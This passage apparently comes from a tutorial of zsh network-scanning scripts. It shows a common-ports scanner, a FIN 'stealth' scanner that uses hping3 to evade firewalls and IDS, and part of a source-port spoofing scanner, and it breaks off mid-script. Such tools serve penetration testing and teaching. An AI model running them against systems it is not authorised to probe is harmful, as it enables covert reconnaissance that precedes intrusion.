IFS=',' PORT_ARRAY=(${=PORTS_TO_SCAN})
TOTAL_PORTS=${#PORT_ARRAY[@]}

# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║      COMMON PORTS SCANNER              ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}      $TARGET"
echo -e "  ${BLUE}Scan Type:${NC}   $SCAN_DESCRIPTION"
echo -e "  ${BLUE}Total Ports:${NC} $TOTAL_PORTS"
echo -e "  ${BLUE}Threads:${NC}     $THREADS"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Resolve target
echo -e "${YELLOW}[*] Resolving target...${NC}"
TARGET_IP=$(ping -c 1 "$TARGET" 2>/dev/null | grep -oE "\([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\)" | tr -d '()')
if [ -z "$TARGET_IP" ]; then
    TARGET_IP="$TARGET"
    echo -e "${YELLOW}[*] Could not resolve hostname, using as-is${NC}"
else
    echo -e "${GREEN}[✓] Target resolved to: $TARGET_IP${NC}"
fi

# Create temporary files
TMPDIR=$(mktemp -d)
OPEN_PORTS_FILE="$TMPDIR/open_ports"
trap "rm -rf $TMPDIR" EXIT

# Start time
START_TIME=$(date +%s)

echo ""
echo -e "${GREEN}[+] Starting scan of $TOTAL_PORTS common ports...${NC}"
echo ""

# Progress tracking
SCANNED=0

# Function to update progress
show_progress() {
    local current=$1
    local total=$2
    if [ "$total" -eq 0 ]; then
        return
    fi
    local percent=$((current * 100 / total))
    printf "\r${CYAN}Progress: [%-50s] %d%% (%d/%d ports)${NC}" \
           "$(printf '#%.0s' $(seq 1 $((percent / 2))))" \
           "$percent" "$current" "$total"
}

# Main scanning loop
for port in "${PORT_ARRAY[@]}"; do
    # Remove any whitespace
    port=$(echo "$port" | tr -d ' ')
    
    # Launch scan in background
    scan_port "$TARGET_IP" "$port" "$OPEN_PORTS_FILE" &
    
    # Manage parallel jobs
    JOBS_COUNT=$(jobs -r | wc -l)
    while [ "$JOBS_COUNT" -ge "$THREADS" ]; do
        sleep 0.05
        JOBS_COUNT=$(jobs -r | wc -l)
    done
    
    # Update progress
    ((SCANNED++))
    show_progress "$SCANNED" "$TOTAL_PORTS"
done

# Wait for remaining jobs
echo -e "\n${YELLOW}[*] Waiting for remaining scans to complete...${NC}"
wait

# End time
END_TIME=$(date +%s)
DURATION=$((END_TIME - START_TIME))

# Process results
echo -e "\r\033[K"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}           SCAN RESULTS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Count open ports
OPEN_COUNT=0
if [ -f "$OPEN_PORTS_FILE" ]; then
    OPEN_COUNT=$(wc -l < "$OPEN_PORTS_FILE" | tr -d ' ')
fi

# Display results
if [ "$OPEN_COUNT" -gt 0 ]; then
    echo -e "${GREEN}[✓] Found $OPEN_COUNT open port(s)${NC}"
    echo ""
    echo -e "${MAGENTA}Open Ports Summary:${NC}"
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    printf "${WHITE}%-10s %-20s${NC}\n" "PORT" "SERVICE"
    echo -e "${CYAN}────────────────────────────────────────${NC}"
    
    # Sort and display open ports
    sort -t: -k1 -n "$OPEN_PORTS_FILE" | while IFS=: read -r port service; do
        printf "${GREEN}%-10s${NC} ${YELLOW}%-20s${NC}\n" "$port/tcp" "$service"
    done
    
    # Group by service type
    echo ""
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    echo -e "${MAGENTA}Services by Category:${NC}"
    echo -e "${CYAN}────────────────────────────────────────${NC}"
    
    # Categorize services
    WEB_PORTS=""
    MAIL_PORTS=""
    DB_PORTS=""
    REMOTE_PORTS=""
    FILE_PORTS=""
    OTHER_PORTS=""
    
    while IFS=: read -r port service; do
        case $port in
            80|443|8080|8443|8000|8888|3000|5000|9000)
                WEB_PORTS="${WEB_PORTS}${port}($service) "
                ;;
            25|110|143|465|587|993|995)
                MAIL_PORTS="${MAIL_PORTS}${port}($service) "
                ;;
            1433|1521|3306|5432|6379|7000|9200|11211|27017)
                DB_PORTS="${DB_PORTS}${port}($service) "
                ;;
            22|23|3389|5900|5901|5902)
                REMOTE_PORTS="${REMOTE_PORTS}${port}($service) "
                ;;
            20|21|69|139|445|873|2049)
                FILE_PORTS="${FILE_PORTS}${port}($service) "
                ;;
            *)
                OTHER_PORTS="${OTHER_PORTS}${port}($service) "
                ;;
        esac
    done < "$OPEN_PORTS_FILE"
    
    [[ -n "$WEB_PORTS" ]] && echo -e "${BLUE}Web Services:${NC} $WEB_PORTS"
    [[ -n "$MAIL_PORTS" ]] && echo -e "${BLUE}Mail Services:${NC} $MAIL_PORTS"
    [[ -n "$DB_PORTS" ]] && echo -e "${BLUE}Database Services:${NC} $DB_PORTS"
    [[ -n "$REMOTE_PORTS" ]] && echo -e "${BLUE}Remote Access:${NC} $REMOTE_PORTS"
    [[ -n "$FILE_PORTS" ]] && echo -e "${BLUE}File Services:${NC} $FILE_PORTS"
    [[ -n "$OTHER_PORTS" ]] && echo -e "${BLUE}Other Services:${NC} $OTHER_PORTS"
    
    # Save report
    REPORT_FILE="common_ports_${TARGET}_$(date +%Y%m%d_%H%M%S).txt"
    {
        echo "Common Ports Scan Report"
        echo "========================"
        echo "Target: $TARGET ($TARGET_IP)"
        echo "Scan Type: $SCAN_DESCRIPTION"
        echo "Total Ports Scanned: $TOTAL_PORTS"
        echo "Open Ports Found: $OPEN_COUNT"
        echo "Scan Date: $(date)"
        echo "Duration: ${DURATION} seconds"
        echo ""
        echo "Open Ports:"
        echo "-----------"
        sort -t: -k1 -n "$OPEN_PORTS_FILE" | while IFS=: read -r port service; do
            printf "%-10s %s\n" "$port/tcp" "$service"
        done
    } > "$REPORT_FILE"
    
    echo ""
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    echo -e "${BLUE}[*] Report saved to: $REPORT_FILE${NC}"
else
    echo -e "${YELLOW}[-] No open ports found${NC}"
    echo -e "${YELLOW}    Possible reasons:${NC}"
    echo -e "${YELLOW}    • All scanned ports are closed${NC}"
    echo -e "${YELLOW}    • Firewall is blocking connections${NC}"
    echo -e "${YELLOW}    • Target is down or unreachable${NC}"
fi

# Display statistics
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}           STATISTICS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "  ${BLUE}Ports Scanned:${NC}  $TOTAL_PORTS"
echo -e "  ${GREEN}Open Ports:${NC}     $OPEN_COUNT"
if [ "$TOTAL_PORTS" -gt 0 ]; then
    echo -e "  ${RED}Success Rate:${NC}   $(( OPEN_COUNT * 100 / TOTAL_PORTS ))%"
else
    echo -e "  ${RED}Success Rate:${NC}   N/A"
fi
echo -e "  ${BLUE}Scan Duration:${NC}  ${DURATION} seconds"
if [ "$TOTAL_PORTS" -gt 0 ]; then
    echo -e "  ${BLUE}Scan Rate:${NC}      ~$(( TOTAL_PORTS / (DURATION + 1) )) ports/sec"
else
    echo -e "  ${BLUE}Scan Rate:${NC}      N/A"
fi
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

# Provide recommendations
if [ "$OPEN_COUNT" -gt 0 ]; then
    echo ""
    echo -e "${YELLOW}Security Recommendations:${NC}"
    echo -e "${CYAN}────────────────────────────────────────${NC}"
    
    # Check for risky services
    if grep -q "23:" "$OPEN_PORTS_FILE" 2>/dev/null; then
        echo -e "${RED}⚠ Telnet (port 23) is insecure - use SSH instead${NC}"
    fi
    if grep -q "21:" "$OPEN_PORTS_FILE" 2>/dev/null; then
        echo -e "${YELLOW}⚠ FTP (port 21) transmits credentials in plaintext${NC}"
    fi
    if grep -q "139:\|445:" "$OPEN_PORTS_FILE" 2>/dev/null; then
        echo -e "${YELLOW}⚠ SMB/NetBIOS ports are exposed - ensure proper access controls${NC}"
    fi
    if grep -q "3389:" "$OPEN_PORTS_FILE" 2>/dev/null; then
        echo -e "${YELLOW}⚠ RDP (port 3389) is exposed - use VPN or restrict access${NC}"
    fi
    if grep -q "3306:\|5432:\|1433:" "$OPEN_PORTS_FILE" 2>/dev/null; then
        echo -e "${YELLOW}⚠ Database ports are exposed - should not be publicly accessible${NC}"
    fi
fi

echo ""
exit 0
EOF

chmod +x ./common_ports_scan.sh

How to Run:

# Scan default common ports
./common_ports_scan.sh example.com

# Scan web server ports
./common_ports_scan.sh example.com web

# Scan database ports
./common_ports_scan.sh example.com database

# Scan top 100 ports
./common_ports_scan.sh example.com top100

# Scan top 1000 ports with 100 threads
./common_ports_scan.sh example.com top1000 100

# Custom port list
./common_ports_scan.sh example.com "22,80,443,3306,8080"

# Get help
./common_ports_scan.sh --help

Default Ports Included:
– **21**: FTP (File Transfer Protocol)
– **22**: SSH (Secure Shell)
– **23**: Telnet
– **25**: SMTP (Simple Mail Transfer Protocol)
– **53**: DNS (Domain Name System)
– **80**: HTTP (Hypertext Transfer Protocol)
– **443**: HTTPS (HTTP Secure)
– **3306**: MySQL Database
– **3389**: RDP (Remote Desktop Protocol)
– **5432**: PostgreSQL Database

Script 6: Stealth FIN Scanner

Purpose:


Performs FIN scanning, a stealth technique that sends TCP packets with only the FIN flag set. This can bypass some firewalls and intrusion detection systems that only monitor SYN packets.

Create the Script:

cat > ./fin_scan.sh << 'EOF'
#!/bin/zsh

# TCP FIN Scanner using hping3
# Performs stealthy FIN scans to detect firewall rules and port states
# FIN scanning is a stealth technique that may bypass some firewalls
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
WHITE='\033[1;37m'
NC='\033[0m' # No Color

# Parse arguments
TARGET="$1"
PORT_SPEC="${2:-80}"
COUNT="${3:-2}"
DELAY="${4:-1}"

# Function to print usage
print_usage() {
    local script_name="./fin_scan.sh"
    echo "Usage: $script_name <target> [port|port_range] [count] [delay]"
    echo ""
    echo "Parameters:"
    echo "  target      - Hostname or IP address to scan"
    echo "  port        - Single port or range (e.g., 80 or 80-90)"
    echo "  count       - Number of FIN packets per port (default: 2)"
    echo "  delay       - Delay between packets in seconds (default: 1)"
    echo ""
    echo "Examples:"
    echo "  $script_name example.com                # Scan port 80"
    echo "  $script_name example.com 443            # Scan port 443"
    echo "  $script_name example.com 80-85          # Scan ports 80-85"
    echo "  $script_name 192.168.1.1 22 3 0.5       # 3 packets, 0.5s delay"
    echo ""
    echo "FIN Scan Technique:"
    echo "  - Sends TCP packets with only FIN flag set"
    echo "  - CLOSED ports respond with RST"
    echo "  - OPEN ports typically don't respond (stealth)"
    echo "  - FILTERED ports may send ICMP or no response"
    echo ""
    echo "Response Interpretation:"
    echo "  RST received    = Port is CLOSED"
    echo "  No response     = Port is likely OPEN or FILTERED"
    echo "  ICMP received   = Port is FILTERED by firewall"
}

# Function to validate port
validate_port() {
    local port=$1
    if ! [[ "$port" =~ ^[0-9]+$ ]]; then
        return 1
    fi
    if [ "$port" -lt 1 ] || [ "$port" -gt 65535 ]; then
        return 1
    fi
    return 0
}

# Function to get service name
get_service_name() {
    local port=$1
    # Trim any whitespace from port number
    port=$(echo "$port" | tr -d ' ')
    # Common services
    case $port in
        21) echo "FTP" ;;
        22) echo "SSH" ;;
        23) echo "Telnet" ;;
        25) echo "SMTP" ;;
        53) echo "DNS" ;;
        80) echo "HTTP" ;;
        110) echo "POP3" ;;
        143) echo "IMAP" ;;
        443) echo "HTTPS" ;;
        445) echo "SMB" ;;
        3306) echo "MySQL" ;;
        3389) echo "RDP" ;;
        5432) echo "PostgreSQL" ;;
        6379) echo "Redis" ;;
        8080) echo "HTTP-Alt" ;;
        8443) echo "HTTPS-Alt" ;;
        27017) echo "MongoDB" ;;
        *)
            # Try system services
            local service=$(grep -w "^[^#]*$port/tcp" /etc/services 2>/dev/null | head -1 | awk '{print $1}')
            if [[ -n "$service" ]]; then
                echo "$service"
            else
                echo "Unknown"
            fi
            ;;
    esac
}

# Function to perform FIN scan on a single port
scan_port() {
    local target=$1
    local port=$2
    local count=$3
    local delay=$4
    
    local service=$(get_service_name "$port")
    echo ""
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    echo -e "${BLUE}Scanning Port:${NC} $port/tcp ($service)"
    echo -e "${CYAN}────────────────────────────────────────${NC}"
    
    local responses=0
    local rst_count=0
    local icmp_count=0
    local no_response=0
    
    for i in $(seq 1 $count); do
        echo -e "${YELLOW}[→] Sending FIN packet $i/$count to port $port...${NC}"
        
        # Run hping3 with FIN flag
        local result=$(hping3 -F -p "$port" -c 1 "$target" 2>&1)
        
        # Analyze response
        if echo "$result" | grep -q "flags=RA\|flags=R"; then
            echo -e "${RED}[←] RST received - Port $port is CLOSED${NC}"
            ((rst_count++))
            ((responses++))
        elif echo "$result" | grep -q "ICMP"; then
            echo -e "${YELLOW}[←] ICMP received - Port $port is FILTERED${NC}"
            ((icmp_count++))
            ((responses++))
        elif echo "$result" | grep -q "timeout\|100% packet loss"; then
            echo -e "${GREEN}[◊] No response - Port $port may be OPEN or heavily FILTERED${NC}"
            ((no_response++))
        else
            # Check for any other response
            if echo "$result" | grep -q "len="; then
                echo -e "${BLUE}[←] Unexpected response received${NC}"
                ((responses++))
            else
                echo -e "${GREEN}[◊] No response - Port $port may be OPEN${NC}"
                ((no_response++))
            fi
        fi
        
        # Add delay between packets
        if [ "$i" -lt "$count" ] && [ "$delay" != "0" ]; then
            sleep "$delay"
        fi
    done
    
    # Port state analysis
    echo ""
    echo -e "${CYAN}Port $port Analysis:${NC}"
    echo -e "  Packets sent: $count"
    echo -e "  RST responses: $rst_count"
    echo -e "  ICMP responses: $icmp_count"
    echo -e "  No responses: $no_response"
    
    # Determine likely port state
    if [ "$rst_count" -gt 0 ]; then
        echo -e "  ${RED}▸ Verdict: Port $port is CLOSED${NC}"
    elif [ "$icmp_count" -gt 0 ]; then
        echo -e "  ${YELLOW}▸ Verdict: Port $port is FILTERED (firewall blocking)${NC}"
    elif [ "$no_response" -eq "$count" ]; then
        echo -e "  ${GREEN}▸ Verdict: Port $port is likely OPEN or silently FILTERED${NC}"
        echo -e "  ${CYAN}  Note: No response to FIN often indicates OPEN port${NC}"
    else
        echo -e "  ${BLUE}▸ Verdict: Port $port state is UNCERTAIN${NC}"
    fi
    
    return $responses
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Parse port specification (single port or range)
START_PORT=""
END_PORT=""

if [[ "$PORT_SPEC" =~ ^([0-9]+)-([0-9]+)$ ]]; then
    # Port range (zsh compatible)
    START_PORT="${match[1]}"
    END_PORT="${match[2]}"
    
    # Validate range
    if ! validate_port "$START_PORT" || ! validate_port "$END_PORT"; then
        echo -e "${RED}Error: Invalid port range${NC}"
        exit 1
    fi
    
    if [ "$START_PORT" -gt "$END_PORT" ]; then
        echo -e "${RED}Error: Start port must be less than or equal to end port${NC}"
        exit 1
    fi
elif [[ "$PORT_SPEC" =~ ^[0-9]+$ ]]; then
    # Single port
    if ! validate_port "$PORT_SPEC"; then
        echo -e "${RED}Error: Port must be between 1-65535${NC}"
        exit 1
    fi
    START_PORT="$PORT_SPEC"
    END_PORT="$PORT_SPEC"
else
    echo -e "${RED}Error: Invalid port specification${NC}"
    echo "Use a single port (e.g., 80) or range (e.g., 80-90)"
    exit 1
fi

# Validate count
if ! [[ "$COUNT" =~ ^[0-9]+$ ]] || [ "$COUNT" -lt 1 ]; then
    echo -e "${RED}Error: Count must be a positive number${NC}"
    exit 1
fi

# Validate delay
if ! [[ "$DELAY" =~ ^[0-9]*\.?[0-9]+$ ]]; then
    echo -e "${RED}Error: Delay must be a number${NC}"
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: FIN scan requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Calculate total ports
TOTAL_PORTS=$((END_PORT - START_PORT + 1))

# Display header
echo -e "${MAGENTA}╔════════════════════════════════════════╗${NC}"
echo -e "${MAGENTA}║         TCP FIN SCANNER                ║${NC}"
echo -e "${MAGENTA}║      (Stealth Scan Technique)          ║${NC}"
echo -e "${MAGENTA}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}         $TARGET"
if [ "$START_PORT" -eq "$END_PORT" ]; then
    echo -e "  ${BLUE}Port:${NC}           $START_PORT"
else
    echo -e "  ${BLUE}Port Range:${NC}     $START_PORT-$END_PORT ($TOTAL_PORTS ports)"
fi
echo -e "  ${BLUE}Packets/Port:${NC}   $COUNT"
echo -e "  ${BLUE}Packet Delay:${NC}   ${DELAY}s"
echo -e "  ${BLUE}Scan Type:${NC}      TCP FIN (Stealth)"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

# Resolve target
echo ""
echo -e "${YELLOW}[*] Resolving target...${NC}"
TARGET_IP=$(ping -c 1 "$TARGET" 2>/dev/null | grep -oE "\([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\)" | tr -d '()')
if [ -z "$TARGET_IP" ]; then
    TARGET_IP="$TARGET"
    echo -e "${YELLOW}[*] Could not resolve hostname, using as-is${NC}"
else
    echo -e "${GREEN}[✓] Target resolved to: $TARGET_IP${NC}"
fi

# Start time
START_TIME=$(date +%s)

echo ""
echo -e "${GREEN}[+] Starting FIN scan...${NC}"
echo -e "${CYAN}[i] FIN scan sends TCP packets with only the FIN flag set${NC}"
echo -e "${CYAN}[i] This technique may bypass some packet filters and IDS${NC}"

# Results tracking
declare -A PORT_STATES
OPEN_PORTS=""
CLOSED_PORTS=""
FILTERED_PORTS=""

# Main scanning loop
for port in $(seq $START_PORT $END_PORT); do
    scan_port "$TARGET_IP" "$port" "$COUNT" "$DELAY"
    
    # Store result based on responses
    if [ $? -eq 0 ]; then
        # No responses likely means open
        OPEN_PORTS="${OPEN_PORTS}$port "
        PORT_STATES[$port]="OPEN/FILTERED"
    fi
done

# End time
END_TIME=$(date +%s)
DURATION=$((END_TIME - START_TIME))

# Generate summary report
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}         SCAN SUMMARY${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Count results
OPEN_COUNT=$(echo "$OPEN_PORTS" | wc -w | tr -d ' ')
CLOSED_COUNT=$(echo "$CLOSED_PORTS" | wc -w | tr -d ' ')
FILTERED_COUNT=$(echo "$FILTERED_PORTS" | wc -w | tr -d ' ')

echo -e "${BLUE}Scan Results:${NC}"
echo -e "  Total Ports Scanned: $TOTAL_PORTS"
echo -e "  Likely Open/Filtered: $OPEN_COUNT"
echo -e "  Confirmed Closed: $CLOSED_COUNT"
echo -e "  Confirmed Filtered: $FILTERED_COUNT"
echo -e "  Scan Duration: ${DURATION} seconds"

if [ "$OPEN_COUNT" -gt 0 ]; then
    echo ""
    echo -e "${GREEN}Potentially Open Ports:${NC}"
    for port in $OPEN_PORTS; do
        service=$(get_service_name "$port")
        echo -e "  ${GREEN}▸${NC} Port $port/tcp - $service"
    done
fi

# Save report to file
REPORT_FILE="fin_scan_${TARGET}_$(date +%Y%m%d_%H%M%S).txt"
{
    echo "TCP FIN Scan Report"
    echo "==================="
    echo "Target: $TARGET ($TARGET_IP)"
    echo "Port Range: $START_PORT-$END_PORT"
    echo "Scan Date: $(date)"
    echo "Duration: ${DURATION} seconds"
    echo "Technique: TCP FIN (Stealth Scan)"
    echo ""
    echo "Results:"
    echo "--------"
    echo "Likely Open/Filtered: $OPEN_COUNT"
    echo "Confirmed Closed: $CLOSED_COUNT"
    echo "Confirmed Filtered: $FILTERED_COUNT"
    
    if [ "$OPEN_COUNT" -gt 0 ]; then
        echo ""
        echo "Potentially Open Ports:"
        for port in $OPEN_PORTS; do
            service=$(get_service_name "$port")
            echo "  Port $port/tcp - $service"
        done
    fi
} > "$REPORT_FILE"

echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${BLUE}[*] Report saved to: $REPORT_FILE${NC}"
echo ""
echo -e "${YELLOW}Important Notes:${NC}"
echo -e "${CYAN}• FIN scanning is a stealth technique${NC}"
echo -e "${CYAN}• No response often indicates an OPEN port${NC}"
echo -e "${CYAN}• RST response indicates a CLOSED port${NC}"
echo -e "${CYAN}• Results may vary based on firewall rules${NC}"
echo -e "${CYAN}• Some systems may not follow RFC standards${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit 0
EOF

chmod +x ./fin_scan.sh

How to Run:

# Scan default port 80
./fin_scan.sh example.com

# Scan specific port
./fin_scan.sh example.com 443

# Scan port range
./fin_scan.sh example.com 80-85

# Custom parameters
./fin_scan.sh 192.168.1.1 22 3 0.5

# Quick single packet scan
./fin_scan.sh server.com 80-443 1 0

# Get help
./fin_scan.sh --help

Response Interpretation:
– **No response**: Port likely open (or filtered)
– **RST response**: Port closed
– **ICMP unreachable**: Port filtered

Script 7: Source Port Spoofing

Purpose:
Modifies the source port of outgoing packets to bypass firewall rules that allow traffic from specific “trusted” ports like DNS (53) or FTP-DATA (20).

Create the Script:

cat > ./source_port_scan.sh << 'EOF'
#!/bin/zsh

# Source Port Spoofing Scanner using hping3
# Attempts to bypass firewalls that trust certain source ports
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
NC='\033[0m' # No Color

# Parse arguments early
TARGET="$1"
DEST_PORT="${2:-80}"
SOURCE_PORT="${3:-53}"
COUNT="${4:-1}"

# Function to print usage
print_usage() {
    local script_name="./source_port_scan.sh"
    echo "Usage: $script_name <target> [dest_port] [source_port] [count]"
    echo ""
    echo "Parameters:"
    echo "  target       - Hostname or IP address to scan"
    echo "  dest_port    - Destination port to scan (default: 80)"
    echo "  source_port  - Source port to spoof (default: 53)"
    echo "  count        - Number of packets to send (default: 1)"
    echo ""
    echo "Common trusted source ports:"
    echo "  53 (DNS), 20 (FTP-DATA), 123 (NTP), 67/68 (DHCP)"
    echo ""
    echo "Examples:"
    echo "  $script_name example.com                  # Scan port 80 from source port 53"
    echo "  $script_name example.com 443               # Scan port 443 from source port 53"
    echo "  $script_name example.com 80 20             # Scan port 80 from source port 20"
    echo "  $script_name example.com 80 53 3           # Send 3 packets"
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: Source port scan requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Map common source ports to names
declare -A source_services
source_services[53]="DNS"
source_services[20]="FTP-DATA"
source_services[123]="NTP"
source_services[67]="DHCP"
source_services[68]="DHCP"
source_services[88]="Kerberos"
source_services[500]="IKE/IPSec"

SERVICE_NAME=${source_services[$SOURCE_PORT]:-"Custom"}

# Display header
echo -e "${MAGENTA}╔════════════════════════════════════════╗${NC}"
echo -e "${MAGENTA}║    SOURCE PORT SPOOFING SCANNER       ║${NC}"
echo -e "${MAGENTA}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}         $TARGET:$DEST_PORT"
echo -e "  ${BLUE}Source Port:${NC}    $SOURCE_PORT ($SERVICE_NAME)"
echo -e "  ${BLUE}Packet Count:${NC}   $COUNT"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""
echo -e "${YELLOW}[*] Attempting to bypass firewall rules that trust source port $SOURCE_PORT${NC}"
echo -e "${CYAN}[i] Some firewalls allow traffic from 'trusted' source ports${NC}"
echo ""

# Resolve target
echo -e "${YELLOW}[*] Resolving target...${NC}"
TARGET_IP=$(ping -c 1 "$TARGET" 2>/dev/null | grep -oE "\([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\)" | tr -d '()')
if [ -z "$TARGET_IP" ]; then
    TARGET_IP="$TARGET"
    echo -e "${YELLOW}[*] Could not resolve hostname, using as-is${NC}"
else
    echo -e "${GREEN}[✓] Target resolved to: $TARGET_IP${NC}"
fi

echo ""
echo -e "${GREEN}[+] Starting source port spoofing scan...${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

OPEN_COUNT=0
CLOSED_COUNT=0
FILTERED_COUNT=0

for i in $(seq 1 $COUNT); do
    echo -e "${CYAN}[→] Sending SYN packet $i/$COUNT from port $SOURCE_PORT...${NC}"
    result=$(hping3 -S -p $DEST_PORT -s $SOURCE_PORT -c 1 $TARGET_IP 2>&1)
    
    if echo "$result" | grep -q "flags=SA\|flags=S\.A"; then
        echo -e "${GREEN}[✓] Port $DEST_PORT appears OPEN (SYN+ACK received)${NC}"
        echo -e "${GREEN}    → Source port spoofing may have bypassed filtering!${NC}"
        ((OPEN_COUNT++))
    elif echo "$result" | grep -q "flags=RA\|flags=R"; then
        echo -e "${RED}[✗] Port $DEST_PORT appears CLOSED (RST received)${NC}"
        ((CLOSED_COUNT++))
    elif echo "$result" | grep -q "ICMP"; then
        icmp_type=$(echo "$result" | grep -oE "ICMP [^,]+" | head -1)
        echo -e "${YELLOW}[!] ICMP response received: $icmp_type${NC}"
        echo -e "${YELLOW}    → Port is likely FILTERED by firewall${NC}"
        ((FILTERED_COUNT++))
    elif echo "$result" | grep -q "100% packet loss\|timeout"; then
        echo -e "${YELLOW}[?] No response - Port $DEST_PORT may be FILTERED${NC}"
        ((FILTERED_COUNT++))
    else
        # Check for any response
        if echo "$result" | grep -q "len="; then
            echo -e "${BLUE}[←] Unexpected response received${NC}"
            echo "$result" | grep "len=" | head -1
        else
            echo -e "${YELLOW}[?] No response - Port $DEST_PORT may be FILTERED${NC}"
            ((FILTERED_COUNT++))
        fi
    fi
    
    if [ "$i" -lt "$COUNT" ]; then
        sleep 0.5
    fi
done

echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}         SCAN SUMMARY${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""
echo -e "${BLUE}Target:${NC} $TARGET ($TARGET_IP)"
echo -e "${BLUE}Port Scanned:${NC} $DEST_PORT"
echo -e "${BLUE}Source Port Used:${NC} $SOURCE_PORT ($SERVICE_NAME)"
echo ""

if [ "$OPEN_COUNT" -gt 0 ]; then
    echo -e "${GREEN}▸ Verdict: Port $DEST_PORT is OPEN${NC}"
    echo -e "${GREEN}  ✓ Source port $SOURCE_PORT successfully bypassed filtering!${NC}"
    echo -e "${YELLOW}  ⚠ Warning: Firewall may be misconfigured to trust port $SOURCE_PORT${NC}"
elif [ "$CLOSED_COUNT" -gt 0 ]; then
    echo -e "${RED}▸ Verdict: Port $DEST_PORT is CLOSED${NC}"
    echo -e "${CYAN}  Note: Port responded normally regardless of source port${NC}"
else
    echo -e "${YELLOW}▸ Verdict: Port $DEST_PORT is FILTERED${NC}"
    echo -e "${CYAN}  Note: Source port $SOURCE_PORT did not bypass filtering${NC}"
    echo -e "${CYAN}  The firewall is properly configured against source port spoofing${NC}"
fi

echo ""
echo -e "${BLUE}Results Summary:${NC}"
echo -e "  Open responses: $OPEN_COUNT"
